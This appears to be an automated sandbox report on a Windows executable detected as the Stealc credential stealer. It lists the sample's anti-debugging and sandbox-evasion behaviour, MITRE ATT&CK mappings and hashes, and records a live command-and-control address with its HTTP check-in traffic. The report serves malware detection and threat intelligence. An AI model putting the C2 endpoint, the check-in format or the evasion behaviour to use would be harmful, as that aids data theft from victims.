Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C4A60 VirtualProtect 00000000,00000004,00000100,? | 0_2_006C4A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_006E6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E6390 mov eax, dword ptr fs:[00000030h] | 0_2_006E6390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_006E2A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
Source: Yara match | File source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle | 0_2_006E4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle | 0_2_006E46A0
Source: file.exe, file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: na:Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_006E2D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_006E2B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_006E2A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_006E2C10

              Stealing of Sensitive Information

              barindex
Source: Yara match | File source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
Source: Yara match | File source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (number of matching signatures in parentheses; techniques without a count were not observed):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (13), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: Create Account (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206d | 0% | Avira URL Cloud | safe
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php: | file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpz | file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206d | file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.206/c4becf79229cb002.phpE | file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpv | file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562673
                              Start date and time:2024-11-25 21:26:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 2s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 122
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.234.120.54
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, ris-prod.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.943565277107183
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'831'936 bytes
                              MD5:6487be67797f2ab4bcd902c3b34efe97
                              SHA1:6b4a7190c65c8c54c39e66fabab190afd36cb5fb
                              SHA256:bab41e3e4289d1b7d5785304cc05ba4acbb42b51d5d18053305b6bd19a77474a
                              SHA512:790db5f7a970c8528891b0524c30d6f85fea324cb7a87473bf309069daaa83bc0a6ad7aacf0e693890fbfc148649f7f06cb5062cac3f810f472fb4ca990e10ca
                              SSDEEP:49152:cTkgK5NjPRVdIMy6kSLSlU1V59PQ0VTashEI:ikP5NjPLCMy6CCPgsSI
                              TLSH:808533A25F31F12BD8A982F65A4E11FD6EBF0718A2A90FD90CC932559B33EC17514C27
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa9e000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007FB10CCFADAAh
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x249000 | 0x16200 | 09382b56d0dd15be3105c84e1094b225 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x24a000 | 0x2b0 | 0x200 | f8a938b260e64f2424801bedf7c93b9c | False | 0.80078125 | data | 6.065857070606265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2ab000 | 0x200 | 874c08c5ac9bf01a319598be93708a34 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vhjbpyvx | 0x4f7000 | 0x1a6000 | 0x1a5600 | 60e1f57e3e0c5be664a1d25e39629061 | False | 0.9944899974043311 | data | 7.952882497591057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
susocjsk | 0x69d000 | 0x1000 | 0x400 | 10bb90abb7fbd5efb26e0bca63557101 | False | 0.8232421875 | data | 6.347150191509316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69e000 | 0x3000 | 0x2200 | f0872884f3d3a2170f03185ce3337c86 | False | 0.060776654411764705 | DOS executable (COM) | 0.7186706726501075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x69c1ac | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T21:27:12.585325+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49717 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 21:27:10.615768909 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:10.739588976 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 21:27:10.739659071 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:10.740847111 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:10.860857010 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 21:27:12.075767994 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 21:27:12.075968027 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:12.142591953 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:12.263593912 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 21:27:12.585252047 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
Nov 25, 2024 21:27:12.585325003 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
Nov 25, 2024 21:27:14.570225000 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
• 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49717 | 185.215.113.206 | 80 | 3800 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 21:27:10.740847111 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Nov 25, 2024 21:27:12.075767994 CET | 203 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 20:27:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Nov 25, 2024 21:27:12.142591953 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a
Data Ascii:
------HDAFIIDAKJDGDHIDAKJJ
Content-Disposition: form-data; name="hwid"

CF9C3B67AD1C389561124
------HDAFIIDAKJDGDHIDAKJJ
Content-Disposition: form-data; name="build"

mars
------HDAFIIDAKJDGDHIDAKJJ--
Nov 25, 2024 21:27:12.585252047 CET | 210 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 20:27:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block")

Target ID: 0
Start time: 15:27:07
Start date: 25/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x6c0000
File size: 1'831'936 bytes
MD5 hash: 6487BE67797F2AB4BCD902C3B34EFE97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.3%
Total number of Nodes: 1407
Total number of Limit Nodes: 28
26549 6c4451 26548->26549 26550 6c4a60 2 API calls 26549->26550 26551 6c4467 26550->26551 26552 6c4a60 2 API calls 26551->26552 26553 6c447d 26552->26553 26554 6c4a60 2 API calls 26553->26554 26555 6c4493 26554->26555 26556 6c4a60 2 API calls 26555->26556 26557 6c44a9 26556->26557 26558 6c4a60 2 API calls 26557->26558 26559 6c44c2 26558->26559 26560 6c4a60 2 API calls 26559->26560 26561 6c44d8 26560->26561 26562 6c4a60 2 API calls 26561->26562 26563 6c44ee 26562->26563 26564 6c4a60 2 API calls 26563->26564 26565 6c4504 26564->26565 26566 6c4a60 2 API calls 26565->26566 26567 6c451a 26566->26567 26568 6c4a60 2 API calls 26567->26568 26569 6c4530 26568->26569 26570 6c4a60 2 API calls 26569->26570 26571 6c4549 26570->26571 26572 6c4a60 2 API calls 26571->26572 26573 6c455f 26572->26573 26574 6c4a60 2 API calls 26573->26574 26575 6c4575 26574->26575 26576 6c4a60 2 API calls 26575->26576 26577 6c458b 26576->26577 26578 6c4a60 2 API calls 26577->26578 26579 6c45a1 26578->26579 26580 6c4a60 2 API calls 26579->26580 26581 6c45b7 26580->26581 26582 6c4a60 2 API calls 26581->26582 26583 6c45d0 26582->26583 26584 6c4a60 2 API calls 26583->26584 26585 6c45e6 26584->26585 26586 6c4a60 2 API calls 26585->26586 26587 6c45fc 26586->26587 26588 6c4a60 2 API calls 26587->26588 26589 6c4612 26588->26589 26590 6c4a60 2 API calls 26589->26590 26591 6c4628 26590->26591 26592 6c4a60 2 API calls 26591->26592 26593 6c463e 26592->26593 26594 6c4a60 2 API calls 26593->26594 26595 6c4657 26594->26595 26596 6c4a60 2 API calls 26595->26596 26597 6c466d 26596->26597 26598 6c4a60 2 API calls 26597->26598 26599 6c4683 26598->26599 26600 6c4a60 2 API calls 26599->26600 26601 6c4699 26600->26601 26602 6c4a60 2 API calls 26601->26602 26603 6c46af 26602->26603 26604 6c4a60 2 API calls 26603->26604 26605 6c46c5 26604->26605 26606 6c4a60 2 API calls 26605->26606 26607 6c46de 26606->26607 26608 6c4a60 2 API calls 26607->26608 26609 6c46f4 26608->26609 26610 6c4a60 2 API calls 26609->26610 26611 6c470a 
26610->26611 26612 6c4a60 2 API calls 26611->26612 26613 6c4720 26612->26613 26614 6c4a60 2 API calls 26613->26614 26615 6c4736 26614->26615 26616 6c4a60 2 API calls 26615->26616 26617 6c474c 26616->26617 26618 6c4a60 2 API calls 26617->26618 26619 6c4765 26618->26619 26620 6c4a60 2 API calls 26619->26620 26621 6c477b 26620->26621 26622 6c4a60 2 API calls 26621->26622 26623 6c4791 26622->26623 26624 6c4a60 2 API calls 26623->26624 26625 6c47a7 26624->26625 26626 6c4a60 2 API calls 26625->26626 26627 6c47bd 26626->26627 26628 6c4a60 2 API calls 26627->26628 26629 6c47d3 26628->26629 26630 6c4a60 2 API calls 26629->26630 26631 6c47ec 26630->26631 26632 6c4a60 2 API calls 26631->26632 26633 6c4802 26632->26633 26634 6c4a60 2 API calls 26633->26634 26635 6c4818 26634->26635 26636 6c4a60 2 API calls 26635->26636 26637 6c482e 26636->26637 26638 6c4a60 2 API calls 26637->26638 26639 6c4844 26638->26639 26640 6c4a60 2 API calls 26639->26640 26641 6c485a 26640->26641 26642 6c4a60 2 API calls 26641->26642 26643 6c4873 26642->26643 26644 6c4a60 2 API calls 26643->26644 26645 6c4889 26644->26645 26646 6c4a60 2 API calls 26645->26646 26647 6c489f 26646->26647 26648 6c4a60 2 API calls 26647->26648 26649 6c48b5 26648->26649 26650 6c4a60 2 API calls 26649->26650 26651 6c48cb 26650->26651 26652 6c4a60 2 API calls 26651->26652 26653 6c48e1 26652->26653 26654 6c4a60 2 API calls 26653->26654 26655 6c48fa 26654->26655 26656 6c4a60 2 API calls 26655->26656 26657 6c4910 26656->26657 26658 6c4a60 2 API calls 26657->26658 26659 6c4926 26658->26659 26660 6c4a60 2 API calls 26659->26660 26661 6c493c 26660->26661 26662 6c4a60 2 API calls 26661->26662 26663 6c4952 26662->26663 26664 6c4a60 2 API calls 26663->26664 26665 6c4968 26664->26665 26666 6c4a60 2 API calls 26665->26666 26667 6c4981 26666->26667 26668 6c4a60 2 API calls 26667->26668 26669 6c4997 26668->26669 26670 6c4a60 2 API calls 26669->26670 26671 6c49ad 26670->26671 26672 6c4a60 2 API calls 26671->26672 26673 6c49c3 26672->26673 
26674 6c4a60 2 API calls 26673->26674 26675 6c49d9 26674->26675 26676 6c4a60 2 API calls 26675->26676 26677 6c49ef 26676->26677 26678 6c4a60 2 API calls 26677->26678 26679 6c4a08 26678->26679 26680 6c4a60 2 API calls 26679->26680 26681 6c4a1e 26680->26681 26682 6c4a60 2 API calls 26681->26682 26683 6c4a34 26682->26683 26684 6c4a60 2 API calls 26683->26684 26685 6c4a4a 26684->26685 26686 6e66e0 26685->26686 26687 6e6afe 8 API calls 26686->26687 26688 6e66ed 43 API calls 26686->26688 26689 6e6c08 26687->26689 26690 6e6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26687->26690 26688->26687 26691 6e6c15 8 API calls 26689->26691 26692 6e6cd2 26689->26692 26690->26689 26691->26692 26693 6e6d4f 26692->26693 26694 6e6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26692->26694 26695 6e6d5c 6 API calls 26693->26695 26696 6e6de9 26693->26696 26694->26693 26695->26696 26697 6e6df6 12 API calls 26696->26697 26698 6e6f10 26696->26698 26697->26698 26699 6e6f8d 26698->26699 26700 6e6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26698->26700 26701 6e6f96 GetProcAddress GetProcAddress 26699->26701 26702 6e6fc1 26699->26702 26700->26699 26701->26702 26703 6e6fca GetProcAddress GetProcAddress 26702->26703 26704 6e6ff5 26702->26704 26703->26704 26705 6e70ed 26704->26705 26706 6e7002 10 API calls 26704->26706 26707 6e70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26705->26707 26708 6e7152 26705->26708 26706->26705 26707->26708 26709 6e716e 26708->26709 26710 6e715b GetProcAddress 26708->26710 26711 6e7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26709->26711 26712 6e051f 26709->26712 26710->26709 26711->26712 26713 6c1530 26712->26713 27022 6c1610 26713->27022 26715 6c153b 26716 6c1555 lstrcpy 26715->26716 26717 6c155d 26715->26717 26716->26717 26718 6c1577 lstrcpy 26717->26718 26719 6c157f 26717->26719 26718->26719 26720 6c1599 lstrcpy 26719->26720 
